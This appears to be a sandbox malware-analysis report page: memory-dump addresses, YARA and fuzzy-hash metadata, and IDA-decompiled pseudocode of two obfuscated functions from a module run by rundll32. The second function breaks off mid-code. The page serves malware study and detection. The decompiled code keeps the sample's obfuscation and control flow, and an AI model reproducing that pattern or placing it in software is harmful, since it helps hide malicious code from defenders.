                                                                                                                      0x0068f336
                                                                                                                      0x0068f346
                                                                                                                      0x0068f34a
                                                                                                                      0x0068f34f
                                                                                                                      0x0068f357
                                                                                                                      0x0068f369
                                                                                                                      0x0068f36e
                                                                                                                      0x0068f377
                                                                                                                      0x0068f382
                                                                                                                      0x0068f38d
                                                                                                                      0x0068f398
                                                                                                                      0x0068f3a3
                                                                                                                      0x0068f3af
                                                                                                                      0x0068f3b4
                                                                                                                      0x0068f3ba
                                                                                                                      0x0068f3c2
                                                                                                                      0x0068f3ca
                                                                                                                      0x0068f3d2
                                                                                                                      0x0068f3dd
                                                                                                                      0x0068f3e8
                                                                                                                      0x0068f3f3
                                                                                                                      0x0068f3fb
                                                                                                                      0x0068f408
                                                                                                                      0x0068f409
                                                                                                                      0x0068f40d
                                                                                                                      0x0068f415
                                                                                                                      0x0068f41d
                                                                                                                      0x0068f42b
                                                                                                                      0x0068f42f
                                                                                                                      0x0068f437
                                                                                                                      0x0068f43e
                                                                                                                      0x0068f44b
                                                                                                                      0x0068f453
                                                                                                                      0x0068f458
                                                                                                                      0x0068f460
                                                                                                                      0x0068f468
                                                                                                                      0x0068f470
                                                                                                                      0x0068f478
                                                                                                                      0x0068f480
                                                                                                                      0x0068f488
                                                                                                                      0x0068f490
                                                                                                                      0x0068f498
                                                                                                                      0x0068f4a0
                                                                                                                      0x0068f4a8
                                                                                                                      0x0068f4b0
                                                                                                                      0x0068f4b8
                                                                                                                      0x0068f4c3
                                                                                                                      0x0068f4ce
                                                                                                                      0x0068f4d9
                                                                                                                      0x0068f4e1
                                                                                                                      0x0068f4e6
                                                                                                                      0x0068f4ee
                                                                                                                      0x0068f4f6
                                                                                                                      0x0068f4fe
                                                                                                                      0x0068f50c
                                                                                                                      0x0068f50f
                                                                                                                      0x0068f513
                                                                                                                      0x0068f51b
                                                                                                                      0x0068f523
                                                                                                                      0x0068f52b
                                                                                                                      0x0068f530
                                                                                                                      0x0068f538
                                                                                                                      0x0068f543
                                                                                                                      0x0068f54b
                                                                                                                      0x0068f556
                                                                                                                      0x0068f561
                                                                                                                      0x0068f569
                                                                                                                      0x0068f574
                                                                                                                      0x0068f587
                                                                                                                      0x0068f58e
                                                                                                                      0x0068f599
                                                                                                                      0x0068f5a1
                                                                                                                      0x0068f5a6
                                                                                                                      0x0068f5ae
                                                                                                                      0x0068f5b6
                                                                                                                      0x0068f5c3
                                                                                                                      0x0068f5c7
                                                                                                                      0x0068f5cf
                                                                                                                      0x0068f5d7
                                                                                                                      0x0068f5df
                                                                                                                      0x0068f5e7
                                                                                                                      0x0068f5ef
                                                                                                                      0x0068f5f7
                                                                                                                      0x0068f602
                                                                                                                      0x0068f60a
                                                                                                                      0x0068f611
                                                                                                                      0x0068f61c
                                                                                                                      0x0068f624
                                                                                                                      0x0068f62c
                                                                                                                      0x0068f630
                                                                                                                      0x0068f638
                                                                                                                      0x0068f640
                                                                                                                      0x0068f648
                                                                                                                      0x0068f650
                                                                                                                      0x0068f658
                                                                                                                      0x0068f663
                                                                                                                      0x0068f66b
                                                                                                                      0x0068f676
                                                                                                                      0x0068f67e
                                                                                                                      0x0068f686
                                                                                                                      0x0068f68e
                                                                                                                      0x0068f696
                                                                                                                      0x0068f6a4
                                                                                                                      0x0068f7b0
                                                                                                                      0x00000000
                                                                                                                      0x0068f6aa
                                                                                                                      0x0068f6aa
                                                                                                                      0x0068f6b0
                                                                                                                      0x0068f883
                                                                                                                      0x0068f883
                                                                                                                      0x0068f889
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068f6b6
                                                                                                                      0x0068f6d2
                                                                                                                      0x0068f700
                                                                                                                      0x0068f70a
                                                                                                                      0x0068f70f
                                                                                                                      0x0068f71b
                                                                                                                      0x0068f762
                                                                                                                      0x0068f777
                                                                                                                      0x0068f795
                                                                                                                      0x0068f799
                                                                                                                      0x0068f79e
                                                                                                                      0x0068f7a3
                                                                                                                      0x0068f7a9
                                                                                                                      0x00000000
                                                                                                                      0x0068f7a9
                                                                                                                      0x0068f7a3
                                                                                                                      0x0068f6b0
                                                                                                                      0x0068f898
                                                                                                                      0x0068f898
                                                                                                                      0x0068f7ba
                                                                                                                      0x0068f7c8
                                                                                                                      0x0068f7cf
                                                                                                                      0x0068f7de
                                                                                                                      0x0068f7df
                                                                                                                      0x0068f7e4
                                                                                                                      0x0068f7f0
                                                                                                                      0x0068f837
                                                                                                                      0x0068f843
                                                                                                                      0x0068f849
                                                                                                                      0x0068f858
                                                                                                                      0x0068f85c
                                                                                                                      0x0068f85e
                                                                                                                      0x0068f85f
                                                                                                                      0x0068f861
                                                                                                                      0x0068f863
                                                                                                                      0x0068f86e
                                                                                                                      0x0068f875
                                                                                                                      0x0068f876
                                                                                                                      0x0068f87b
                                                                                                                      0x0068f87e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kD$)$5$<!$Q0
                                                                                                                      • API String ID: 0-101729813
                                                                                                                      • Opcode ID: acc77a30cdff70fd65aa5a121d2deedf80819d5a6c781e0eab0c9f1c76d381f9
                                                                                                                      • Instruction ID: c235ff9f2efcde44c7dbb85323d35eb67b68cac009c5a8275bf3a72706864cdb
                                                                                                                      • Opcode Fuzzy Hash: acc77a30cdff70fd65aa5a121d2deedf80819d5a6c781e0eab0c9f1c76d381f9
                                                                                                                      • Instruction Fuzzy Hash: D11212715083809FD3A8DF21C48AA8BBBE2FBC5714F508A1DE5D986260DBB58949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A0F33 Relevance: 6.5, Strings: 5, Instructions: 260COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A0F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x6a3e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E00687FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E00697BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x6a3000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x6a3e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E00698519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x6a3e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E00691652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0069DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x681590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E0068A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x6a3e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                      0x006a0f36
                                                                                                                      0x006a0f40
                                                                                                                      0x006a0f48
                                                                                                                      0x006a0f56
                                                                                                                      0x006a0f5a
                                                                                                                      0x006a0f62
                                                                                                                      0x006a0f6a
                                                                                                                      0x006a0f72
                                                                                                                      0x006a0f80
                                                                                                                      0x006a0f85
                                                                                                                      0x006a0f8b
                                                                                                                      0x006a0f93
                                                                                                                      0x006a0fa0
                                                                                                                      0x006a0fa3
                                                                                                                      0x006a0fa7
                                                                                                                      0x006a0faf
                                                                                                                      0x006a0fb7
                                                                                                                      0x006a0fbc
                                                                                                                      0x006a0fc4
                                                                                                                      0x006a0fd1
                                                                                                                      0x006a0fd5
                                                                                                                      0x006a0fda
                                                                                                                      0x006a0fdf
                                                                                                                      0x006a0fe7
                                                                                                                      0x006a0fef
                                                                                                                      0x006a0ff7
                                                                                                                      0x006a0fff
                                                                                                                      0x006a100f
                                                                                                                      0x006a1013
                                                                                                                      0x006a101b
                                                                                                                      0x006a1023
                                                                                                                      0x006a102b
                                                                                                                      0x006a1035
                                                                                                                      0x006a1036
                                                                                                                      0x006a103a
                                                                                                                      0x006a103f
                                                                                                                      0x006a1047
                                                                                                                      0x006a104f
                                                                                                                      0x006a105d
                                                                                                                      0x006a1061
                                                                                                                      0x006a1066
                                                                                                                      0x006a106e
                                                                                                                      0x006a1076
                                                                                                                      0x006a107e
                                                                                                                      0x006a1086
                                                                                                                      0x006a108e
                                                                                                                      0x006a1096
                                                                                                                      0x006a109a
                                                                                                                      0x006a10a2
                                                                                                                      0x006a10aa
                                                                                                                      0x006a10b2
                                                                                                                      0x006a10bc
                                                                                                                      0x006a10c0
                                                                                                                      0x006a10c8
                                                                                                                      0x006a10d0
                                                                                                                      0x006a10d8
                                                                                                                      0x006a10e0
                                                                                                                      0x006a10e8
                                                                                                                      0x006a10f0
                                                                                                                      0x006a10f8
                                                                                                                      0x006a10fd
                                                                                                                      0x006a1107
                                                                                                                      0x006a1116
                                                                                                                      0x006a1119
                                                                                                                      0x006a111d
                                                                                                                      0x006a1129
                                                                                                                      0x006a112d
                                                                                                                      0x006a1131
                                                                                                                      0x006a1139
                                                                                                                      0x006a1141
                                                                                                                      0x006a1149
                                                                                                                      0x006a114e
                                                                                                                      0x006a1156
                                                                                                                      0x006a115e
                                                                                                                      0x006a1166
                                                                                                                      0x006a116e
                                                                                                                      0x006a1176
                                                                                                                      0x006a1182
                                                                                                                      0x006a1187
                                                                                                                      0x006a1191
                                                                                                                      0x006a1196
                                                                                                                      0x006a119c
                                                                                                                      0x006a11a4
                                                                                                                      0x006a11b1
                                                                                                                      0x006a11b2
                                                                                                                      0x006a11bc
                                                                                                                      0x006a11c5
                                                                                                                      0x006a11c9
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x00000000
                                                                                                                      0x006a11db
                                                                                                                      0x006a11ed
                                                                                                                      0x006a12a8
                                                                                                                      0x006a12aa
                                                                                                                      0x006a12af
                                                                                                                      0x006a12b1
                                                                                                                      0x006a12b3
                                                                                                                      0x00000000
                                                                                                                      0x006a11f3
                                                                                                                      0x006a11f9
                                                                                                                      0x006a1297
                                                                                                                      0x006a1297
                                                                                                                      0x006a129a
                                                                                                                      0x006a129f
                                                                                                                      0x00000000
                                                                                                                      0x006a11ff
                                                                                                                      0x006a1205
                                                                                                                      0x006a1277
                                                                                                                      0x006a1278
                                                                                                                      0x006a127b
                                                                                                                      0x006a1281
                                                                                                                      0x006a1285
                                                                                                                      0x006a1287
                                                                                                                      0x00000000
                                                                                                                      0x006a128d
                                                                                                                      0x006a128d
                                                                                                                      0x00000000
                                                                                                                      0x006a128d
                                                                                                                      0x006a1207
                                                                                                                      0x006a120d
                                                                                                                      0x006a124c
                                                                                                                      0x006a1252
                                                                                                                      0x006a1256
                                                                                                                      0x006a125d
                                                                                                                      0x006a1261
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x00000000
                                                                                                                      0x006a11d1
                                                                                                                      0x006a120f
                                                                                                                      0x006a1215
                                                                                                                      0x006a138c
                                                                                                                      0x006a1392
                                                                                                                      0x006a1392
                                                                                                                      0x006a121b
                                                                                                                      0x006a1221
                                                                                                                      0x006a1373
                                                                                                                      0x006a1373
                                                                                                                      0x006a1379
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x00000000
                                                                                                                      0x006a11d7
                                                                                                                      0x006a1227
                                                                                                                      0x006a122b
                                                                                                                      0x006a1233
                                                                                                                      0x00000000
                                                                                                                      0x006a1233
                                                                                                                      0x006a1221
                                                                                                                      0x006a1215
                                                                                                                      0x006a120d
                                                                                                                      0x006a1205
                                                                                                                      0x006a11f9
                                                                                                                      0x006a139b
                                                                                                                      0x006a13a1
                                                                                                                      0x006a13a7
                                                                                                                      0x006a13ac
                                                                                                                      0x006a13ac
                                                                                                                      0x006a12c4
                                                                                                                      0x006a12ca
                                                                                                                      0x006a12d5
                                                                                                                      0x006a12dc
                                                                                                                      0x006a131e
                                                                                                                      0x006a1333
                                                                                                                      0x006a133c
                                                                                                                      0x006a134a
                                                                                                                      0x006a134e
                                                                                                                      0x006a1351
                                                                                                                      0x006a1354
                                                                                                                      0x006a1361
                                                                                                                      0x006a1366
                                                                                                                      0x006a1366
                                                                                                                      0x006a1369
                                                                                                                      0x006a136d
                                                                                                                      0x00000000
                                                                                                                      0x006a136d
                                                                                                                      0x006a11d7

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4t$=r;$_O\$mWv$N
                                                                                                                      • API String ID: 0-1837770866
                                                                                                                      • Opcode ID: 2983c8908845732896e6f8202ea59ee781727e808d6ce3ea21b53b470e671463
                                                                                                                      • Instruction ID: 6c62011ae882e5b3c87a0cc6d2480bccdeaea9949a55ac4f3776fb098db395a6
                                                                                                                      • Opcode Fuzzy Hash: 2983c8908845732896e6f8202ea59ee781727e808d6ce3ea21b53b470e671463
                                                                                                                      • Instruction Fuzzy Hash: 7EC142715083819FC358DF25C48945BBFE2FBCA358F108A0EF5969A260D3B4D949CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006966CA Relevance: 6.5, Strings: 5, Instructions: 240COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006966CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E00695C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E0069DCF7(_v1084, 0x681060, __eflags);
							_t264 = E0069D25E(_v1120);
							_t282 =  *0x6a3e10; // 0x0
							_t265 =  *0x6a3e10; // 0x0
							E0069453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E0068A8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E0069DCF7(_v1136, 0x681000, _t319);
									_t289 =  *0x6a3e10; // 0x0
									_t306 =  *0x6a3e10; // 0x0
